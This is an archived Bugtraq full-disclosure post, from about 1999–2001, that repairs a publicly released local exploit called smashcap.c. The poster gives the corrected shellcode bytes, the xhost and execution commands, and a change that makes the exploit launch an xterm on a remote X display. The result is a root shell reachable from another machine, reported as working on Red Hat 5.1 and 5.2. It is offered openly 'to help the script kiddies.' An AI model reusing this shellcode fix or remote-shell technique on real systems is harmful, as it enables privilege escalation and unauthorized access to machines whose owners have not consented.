Hi, since bugtraq it's a full-disclosure list, let's
help the script kiddies a bit and scare the sysadms a little bit more...
To make the smashcap.c work , all you have to do is remove one
0xff character before /bin/sh in the shellcode
so the line would be :
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
instead of :
"\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"
also, you'll have to be on console running x to exploit it, but
if you have another box where you can start x then it's ok
myhost$ startx;xhost +victim.com
victim$ ./smashcap
and modify the last line from the smashcap.c into
execl("/usr/X11R6/bin/xterm","xterm", "-display",
"victim.com:0", 0);
well, it works on most redhats (tested on 5.1 and 5.2)
on slakware it sigsegv's , you need to work a little bit, sorry I don't
have a slakware box to work on .
regards, lucysoft
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:01 PDT